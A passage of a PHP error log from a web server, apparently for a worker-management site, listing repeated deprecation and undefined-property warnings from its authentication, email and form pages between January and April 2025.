($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:59:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:59:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 01:00:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 02:03:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 02:09:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 02:23:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 02:23:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 02:47:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 02:59:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 03:08:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 03:29:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 03:29:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 03:32:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 03:33:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 03:34:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 04:21:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 04:52:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 05:30:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 05:31:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 05:46:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 05:53:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 06:08:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 06:26:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 07:24:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 09:28:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 09:31:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 09:32:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 09:32:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 09:32:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 09:32:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 13:41:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 13:51:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 16:27:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 20:52:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 23:59:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 01:01:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 01:20:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 02:12:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 02:12:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [29-Jan-2025 02:56:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 03:12:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 03:31:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 03:59:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 04:46:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 04:48:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 05:30:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 05:32:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Jan-2025 06:55:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 00:14:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 00:29:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 00:35:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 01:09:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 02:40:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 03:38:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 03:58:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 04:04:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Jan-2025 04:45:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [31-Jan-2025 01:03:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [31-Jan-2025 01:06:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [31-Jan-2025 02:15:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [31-Jan-2025 04:22:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Feb-2025 13:52:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Feb-2025 00:40:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Feb-2025 01:33:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Feb-2025 01:18:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Feb-2025 03:15:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Feb-2025 04:25:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Feb-2025 04:31:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Feb-2025 09:16:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Feb-2025 05:22:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Feb-2025 21:36:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Feb-2025 22:32:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Feb-2025 23:57:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Feb-2025 00:39:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Feb-2025 02:42:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Feb-2025 04:26:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Feb-2025 05:33:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Feb-2025 05:33:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Feb-2025 06:42:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Feb-2025 07:12:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Feb-2025 12:10:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Feb-2025 03:36:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Feb-2025 08:02:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Feb-2025 00:14:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Feb-2025 00:43:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Feb-2025 11:42:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Feb-2025 23:12:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Feb-2025 00:59:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Feb-2025 11:49:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Feb-2025 05:24:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [25-Feb-2025 06:48:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Feb-2025 06:02:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Feb-2025 06:02:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Mar-2025 21:47:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Mar-2025 22:01:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Mar-2025 00:52:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Mar-2025 01:10:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Mar-2025 17:19:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Mar-2025 21:46:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Mar-2025 00:21:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Mar-2025 04:31:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Mar-2025 05:43:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Mar-2025 22:36:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Mar-2025 01:10:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Mar-2025 01:48:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 05:27:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 06:13:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 06:16:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 07:37:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 07:38:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 07:50:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 08:19:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Mar-2025 08:19:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Mar-2025 15:57:50 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [23-Mar-2025 10:19:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Mar-2025 11:28:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Mar-2025 14:12:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Mar-2025 23:58:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Mar-2025 07:22:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Mar-2025 07:23:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Mar-2025 07:25:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Mar-2025 07:52:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Mar-2025 08:03:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [25-Mar-2025 04:40:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 00:20:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 00:36:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 00:37:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 02:08:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 02:13:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 02:15:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 02:15:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:01:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:19:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:19:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:19:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:24:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:25:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 03:26:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 04:42:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 05:41:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 05:44:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Mar-2025 05:47:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Mar-2025 01:05:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Mar-2025 02:06:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Mar-2025 03:58:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [29-Mar-2025 01:23:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [31-Mar-2025 02:11:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [31-Mar-2025 12:40:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [01-Apr-2025 02:27:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Apr-2025 20:22:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Apr-2025 23:33:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Apr-2025 23:23:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Apr-2025 23:33:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 00:14:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 00:54:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 01:24:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 02:34:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 05:09:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 08:53:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Apr-2025 14:04:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Apr-2025 05:47:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Apr-2025 12:24:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Apr-2025 12:26:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Apr-2025 12:27:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Apr-2025 12:28:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Apr-2025 22:48:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Apr-2025 22:49:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Apr-2025 22:50:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 02:16:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 02:19:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 02:20:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 02:20:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 02:20:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 06:25:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 07:03:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 11:37:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 12:45:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 12:47:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 22:25:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Apr-2025 22:57:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 22:57:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 22:57:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 22:58:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Apr-2025 23:25:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 00:10:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 00:11:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 00:17:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 00:32:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Apr-2025 00:37:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 01:12:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 01:31:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 01:38:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 01:44:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 02:03:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 02:19:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 02:59:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 03:25:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 03:30:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 03:41:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "date" in 